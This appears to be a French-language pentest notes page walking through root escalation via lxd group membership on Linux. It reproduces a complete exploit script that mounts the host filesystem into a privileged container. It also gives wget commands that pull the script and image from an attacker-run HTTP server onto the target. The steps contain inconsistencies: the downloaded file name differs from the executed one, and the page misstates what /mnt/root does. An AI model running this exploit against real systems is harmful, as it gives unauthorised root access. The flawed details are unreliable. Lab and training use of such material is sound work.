Groupe Utilisateur (lxd) - Linux Privilege Escalation

LXD Exploitation:

Identification de l'appartenance de l'utilisateur ash au groupe lxd :

En vérifiant les groupes auxquels l'utilisateur ash appartient, on remarque qu'il fait partie du groupe lxd, ce qui permet d'exploiter LXC pour obtenir des privilèges root.

Téléchargement et préparation de l'exploit :

Utilisez searchsploit pour obtenir le script d'exploitation correspondant à la vulnérabilité LXC (CVE-2020-16941)

Ce script permet d'exploiter la vulnérabilité LXC pour exécuter des commandes avec des privilèges élevés.

Contenu du script d'exploitation (46978.sh) :

#!/usr/bin/env bash

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi

Le script permet de créer un conteneur LXC avec des privilèges élevés, ce qui nous permet d'obtenir un accès root sur la machine cible.

Téléchargement du fichier d'image Alpine et du script:

Clonez le repository contenant les fichiers nécessaires à l'exploitation et transférez-les à votre machine via un serveur HTTP local.

git clone https://github.com/saghul/lxd-alpine-builder

Démarrez un serveur HTTP local pour servir le fichier et le script

python3 -m http.server 80

Sur votre machine cible, téléchargez le script et le fichier d'image :

cd /tmp
wget http://10.10.14.7/46978.sh
wget http://10.10.14.7/alpine-v3.13-x86_64-20210218_0139.tar.gz

Mise à jour du PATH :

Adaptez le PATH pour s'assurer que les commandes LXC sont correctement interprétées.

export PATH=/home/jordan/.local/bin:/snap/bin:/usr/sandbox:/opt/nvim-linux64/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/share/games:/usr/local/sbin:/usr/sbin:/sbin:/opt/kitty/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/home/jordan/.fzf/bin:/usr/local/bin

Exécution du script d'exploitation

Exécutez le script avec le fichier d'image Alpine téléchargé pour exploiter la vulnérabilité et obtenir un shell root :

./lxd.sh -f alpine-v3.13-x86_64-20210218_0139.tar.gz

Pour sortir du conteneur, il suffit de se rendre dans le répertoire /mnt/root.

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?